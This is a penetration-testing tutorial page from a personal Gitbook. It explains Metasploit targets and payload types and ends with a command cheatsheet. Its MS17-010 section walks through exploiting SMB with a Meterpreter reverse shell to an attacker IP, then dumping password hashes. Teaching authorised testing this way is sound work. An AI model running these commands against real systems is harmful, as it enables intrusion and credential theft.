Noirchapeau's Gitbook
Noirchapeau
Noirchapeau
  • Welcome to NoirChapeau Gitbook
  • Network Mapping and Security Auditing Tool
  • Footprinting - Enumeration and Information Gathering Notes
    • FTP Pentesting Notes
    • SMB Pentesting Notes
    • SSH Pentesting Notes
    • IPMI Pentesting Notes
    • Oracle TNS Pentesting Notes
    • MSSQL Pentesting Notes
    • MySQL Pentesting Notes
    • SNMP Pentesting Notes
    • IMAP/POP3 Pentesting Notes
    • SMTP Pentesting Notes
    • DNS Pentesting Notes
    • NFS Pentesting Notes
  • Web Reconnaissance Notes
  • Vulnerability Assessment Notes
    • Nessus Vulnerability Scanner Notes
    • OpenVAS (GVM) Vulnerability Scanner Notes
  • File Transfer Techniques for Pentesting
    • Advanced File Transfer Techniques
    • File Transfer Detection & Evasion Techniques
  • Shells & Payloads: Shell Overview
    • Shells & Payloads: Payloads Overview
    • Shells & Payloads: Web Shells Overview
    • Shells & Payloads: Detection & Prevention
  • Metasploit
    • Working with Metasploit Modules
    • Targets and Payloads
    • Encoders & Msfvenom: Advanced Exploitation Techniques
    • Database Management in Metasploit
    • Sessions and Jobs
    • Writing and Importing Custom Modules into Metasploit
    • Firewall and IDS/IPS Evasion
  • Password Attacks
    • Remote Password Attacks
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Files & Archives Cracking
    • Password Management
  • Interacting with Common Services
    • Protocol Specific Attacks
Powered by GitBook
On this page
  • What Are Targets?
  • Managing Targets
  • What Are Payloads?
  • Types of Payloads
  • Popular Payload Types
  • Configuring Payloads
  • Example: Exploiting MS17-010 with Payloads
  • Command Cheatsheet
  1. Metasploit

Targets and Payloads

What Are Targets?

In Metasploit, a target defines the specific configurations or versions of an operating system, application, or service that a module is designed to exploit.

Key Points:

  • Some modules automatically detect targets using Automatic mode.

  • Others require manual specification of the target index for successful exploitation.

Managing Targets

  1. Listing Available Targets:

    • Use the show targets command within a module to list supported targets:

      msf6 exploit(module_name) > show targets

      Example Output:

      Id  Name
0   Automatic
1   Windows XP SP3
2   Windows Server 2003

  2. Selecting a Target:

    • Manually specify a target by its index:

      msf6 exploit(module_name) > set target <index>

  3. Best Practices for Target Selection:

    • Use Automatic targeting (set target 0) when unsure of the system version.

    • Manually set the target index if you know the exact configuration for better reliability.

    • Cross-check system details using reconnaissance tools before selecting a target.

What Are Payloads?

Payloads are the code delivered to the target system once an exploit succeeds. They define the actions to be performed on the compromised system, such as opening a shell or maintaining persistent access.

Types of Payloads

  1. Singles:

    • Self-contained payloads that perform a specific task without further dependencies.

    • Example: windows/shell_bind_tcp – Opens a shell bound to a TCP port.

  2. Stagers:

    • Establish a connection (e.g., reverse or bind shell) and prepare the target for larger, staged payloads.

    • Example: windows/meterpreter/reverse_tcp.

  3. Stages:

    • Provide advanced functionalities, downloaded by stagers after the initial connection is established.

    • Example: meterpreter – A powerful post-exploitation toolkit.

Staged vs. Non-Staged Payloads

Type
Characteristics
Example

Staged

Split into smaller parts for stealth.

windows/meterpreter/reverse_tcp

Non-Staged

Single, larger payload for simplicity.

windows/meterpreter_reverse_tcp

Popular Payload Types

  1. Meterpreter:

    • A memory-resident payload with advanced post-exploitation features.

    • Example:

      windows/meterpreter/reverse_tcp

  2. Generic Shells:

    • Provides basic shell access to the target.

    • Example:

      windows/shell_reverse_tcp

  3. Advanced Payloads:

    • Payloads that include specialized functionalities, such as VNC or PowerShell.

    • Examples:

      • windows/vncinject/reverse_tcp – Provides remote desktop access.

      • windows/x64/powershell_reverse_tcp – Executes a reverse shell via PowerShell.

Configuring Payloads

  1. Setting the Payload:

    • Select a payload compatible with the exploit:

      msf6 exploit(module_name) > set payload <payload_name>

    • Example:

      msf6 exploit(ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp

  2. Configuring Payload Options:

    • Use the show options command to view configurable parameters for the payload:

      msf6 exploit(ms17_010_psexec) > show options

    • Example Parameters:

      • LHOST: Local host (attacker's IP).

      • LPORT: Listening port for the payload.

      • RHOSTS: Target host(s) IP address.

  3. Setting Options:

    msf6 exploit(ms17_010_psexec) > set LHOST <attacker_IP>
msf6 exploit(ms17_010_psexec) > set LPORT 4444

  4. Persistent Options:

    • Use setg to globally configure parameters across multiple modules:

      msf6 > setg LHOST <attacker_IP>

Example: Exploiting MS17-010 with Payloads

  1. Select the Exploit:

    msf6 > use exploit/windows/smb/ms17_010_psexec

  2. Set the Payload:

    msf6 exploit(ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp

  3. Configure Options:

    msf6 exploit(ms17_010_psexec) > set RHOSTS <target_IP>
msf6 exploit(ms17_010_psexec) > set LHOST <attacker_IP>
msf6 exploit(ms17_010_psexec) > set LPORT 4444

  4. Execute the Exploit:

    msf6 exploit(ms17_010_psexec) > run

  5. Post-Exploitation:

    • After a successful session, interact with the Meterpreter shell:

      meterpreter > getuid
meterpreter > hashdump

Command Cheatsheet

Command
Description

show targets

Lists supported targets for the module.

set target <index>

Manually sets the target index.

show payloads

Lists compatible payloads for the exploit.

set payload <payload_name>

Assigns a payload to the exploit.

show options

Displays configurable parameters.

set <option> <value>

Configures a parameter for the payload.

setg <option> <value>

Sets a global parameter for all modules.

PreviousWorking with Metasploit ModulesNextEncoders & Msfvenom: Advanced Exploitation Techniques